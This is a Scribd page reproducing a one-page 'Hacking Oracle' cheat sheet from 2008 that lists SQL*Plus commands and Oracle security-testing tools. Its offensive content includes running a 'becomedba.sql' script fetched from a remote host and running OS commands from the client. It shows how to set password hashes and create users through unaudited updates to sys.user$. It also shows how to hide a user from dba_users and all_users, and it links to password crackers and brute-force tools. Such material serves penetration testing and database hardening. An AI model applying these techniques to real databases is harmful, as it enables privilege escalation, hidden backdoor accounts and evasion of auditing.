Scribd
Upload
5 views

oracle_cheat

The document provides a comprehensive overview of SQL*Plus commands and their functionalities, including connecting to databases, executing scripts, and managing user passwords. It also outlines various methods for changing Oracle passwords and creating users, along with tools and links for Oracle security assessments. Additionally, it highlights the importance of certain commands and settings that can impact database security and performance.

Uploaded by

sorabh005s
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
5 views

oracle_cheat

The document provides a comprehensive overview of SQL*Plus commands and their functionalities, including connecting to databases, executing scripts, and managing user passwords. It also outlines various methods for changing Oracle passwords and creating users, along with tools and links for Oracle security assessments. Additionally, it highlights the importance of certain commands and settings that can impact database security and performance.

Uploaded by

sorabh005s
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

SQL*Plus Commands (not always supported in other clients like TOAD, SQL*Navigator,…)

Connect with easy connect:


sqlplus dbsmp/[email protected]:1521/orcl – works only with Oracle 10g/11g clients

SQL*Plus-Commands:
@http://www.orasploit.com/becomedba.sql -- execute a SQL Script from a HTTP server (FTP is also possible)

show parameter -- show all parameters of the database


show parameter audit -- show audit settings

set term off -- disable terminal output


set term on -- enable terminal output
Set heading off -- disable headlines
Set pagesize 0 -- disable pagesize
Set timing on -- show execution time
Set autocommit on -- commit everything after every command (!dangerous!)

host cmd.exe /c 0wned > c:\rds8.txt -- run OS commands from sqlplus (on the client), Instead of host the shortcuts ! (unix) or $ (Windows) are also possible

set serveroutput on -- enable output from dbms_output

spool c:\myspool.txt -- create a logfile of the SQL*Plus Session called myspool.txt (disable: spool off)

desc utl_http -- show package specification of utl_http


desc all_users -- show view specification of all_users

Different ways to change Oracle Passwords:


With SQL*Plus Password cmd: password system; -- Password not send in cleartext
With Alter user cmd: alter user system identified by rds2008; -- Password send in cleartext over the network
With Alter user cmd: alter user system identified by values '737B466C2DF536B9’; -- Set a password hash directly
With grant: grant connect to system identified by rds2008; -- Password send in cleartext over the network
With update: update sys.user$ set password = '737B466C2DF536B9' where name=’SYSTEM’; -- Unsupported, not auditable, flush of the dictionary cash necessary
(alter system flush shared_pool;)
Create Oracle User:
With create user cmd: create user user1 identified by rds2008; grant dba to user1; -- Password send in cleartext over the network
With create role cmd: create role user1 identified by rds2008; update sys.user$ set type#=1 where name=’USER1'; -- Create a role and change the type. Not audited
With grant: grant dba to user1 identified by rds2008; -- Privilege granted, User will be created if not existing
With grant: grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4; -- Password send in cleartext over the network
Invisible User: update sys.user$ set type#=2 where name=’USER1'; -- Hide an user in the views dba_user/all_users, no view modification ncessary

Get Patch Level:


Get Patchlevel via opatch: opatch lsinventory; -- Get the patchlevel via opatch (on DB server, OS level)
Get Patchlevel via SQL: select * from dba_registry_history; -- Get last CPU applied

Useful Tools / Links:


checkpwd: http://www.red-database-security.com/software/checkpwd.html -- fastest multiplatform Oracle dictionary password cracker
woraauthbf http://soonerorlater.hu/download/woraauthbf_0.2.zip -- fastest Oracle Brute Force cracker
anapassword.sql http://www.red-database-security.com/scripts/anapassword.sql -- get a list of application password + type
dbgrep.sql http://www.red-database-security.com/scripts/dbgrep.sql -- search for a specific string in the database
analistener.sql http://www.red-database-security.com/scripts/analistener.sql -- analyse Oracle listener log
tnscmd http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd -- control unprotected TNS Listener without Oracle Client
sidguess: http://www.red-database-security.com/software/sidguess.zip -- fastest Oracle dictionary password cracker
Oracle Assessment Kit: http://www.databasesecurity.com/dbsec/OAK.zip -- useful tools, e.g. to exploit the alter session bug
Oracle Instant Client http://www.oracle.com/technology/software/tech/oci/instantclient/index.html -- Oracle Instant Client
Oracle SQL Developer http://www.oracle.com/technology/software/products/sql/index.html -- GUI Tool for Oracle in Java
Backtrack 2 http://www.remote-exploit.org -- Linux Live CD with many Oracle Security Tools

Hacking Oracle – www.red-database-security.com - Version 1.5.0 - 29-Jan-2008

You might also like